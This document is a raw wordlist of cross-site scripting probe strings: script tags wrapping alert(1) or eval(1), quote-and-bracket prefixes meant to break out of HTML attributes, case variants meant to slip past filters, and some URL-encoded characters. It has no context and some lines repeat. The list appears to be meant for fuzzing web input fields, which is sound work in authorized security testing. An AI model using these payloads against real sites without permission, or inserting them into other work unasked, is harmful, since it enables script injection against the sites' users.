'><SCRIPT>EVAL(1)
'><script>eval(1)
'><Script>Eval(1)
'><SCRIPT>alert(1)
'><script>alert(1)
'><Script>alert(1)
EVAL(1)</SCRIPT>
eval(1)</script>
Eval(1)</Script>
<SCRIPT>alert(%A2XSS%A2)%BC</SCRIPT>
<script>alert(%A2XSS%A2)%BC</script>
<Script>alert(%A2XSS%A2)%BC</Script>
<SCRIPT>AlerT(1)
<script>AlerT(1)
<Script>AlerT(1)
'><SCRIPT>AlerT(1)
'><script>AlerT(1)
'><Script>AlerT(1)
"><SCRIPT>"
"><script>"
"><Script>"
'><SCRIPT>
'><script>
'><Script>
"><SCRIPT>"AlerT(1)
"><script>"AlerT(1)
"><Script>"AlerT(1)
"><SCRIPT>"AlerT(1)
"><script>"AlerT(1)
"><Script>"AlerT(1)
<SCRIPT>
<script>
<Script>
<SCRIPT>AlerT(1)</SCRIPT>
<script>AlerT(1)</script>
<Script>AlerT(1)</Script>
'><SCRIPT>AlerT(1)
'><script>AlerT(1)
'><Script>AlerT(1)
\";EVAL(1)
\";eval(1)
\";Eval(1)
<SCRIPT>alert(1)</SCRIPT>
<script>alert(1)</script>
<Script>alert(1)</Script>
<SCRIPT>alert(%A2XSS%A2)%BC
<script>alert(%A2XSS%A2)%BC
<Script>alert(%A2XSS%A2)%BC
<SCRIPT></SCRIPT>
<script></script>
<Script></Script>
<SCRIPT>EVAL(1)
<script>eval(1)
<Script>Eval(1)
<SCRIPT>AlerT(1)
<script>AlerT(1)
<Script>AlerT(1)
<SCRIPT>AlerT(1)
<script>AlerT(1)
<Script>AlerT(1)
'><SCRIPT>EVAL(1)</SCRIPT>
'><script>eval(1)</script>
'><Script>Eval(1)</Script>
<SCRIPT>AlerT(1)
<script>AlerT(1)
<Script>AlerT(1)
<SCRIPT>alert(1)
<script>alert(1)
<Script>alert(1)
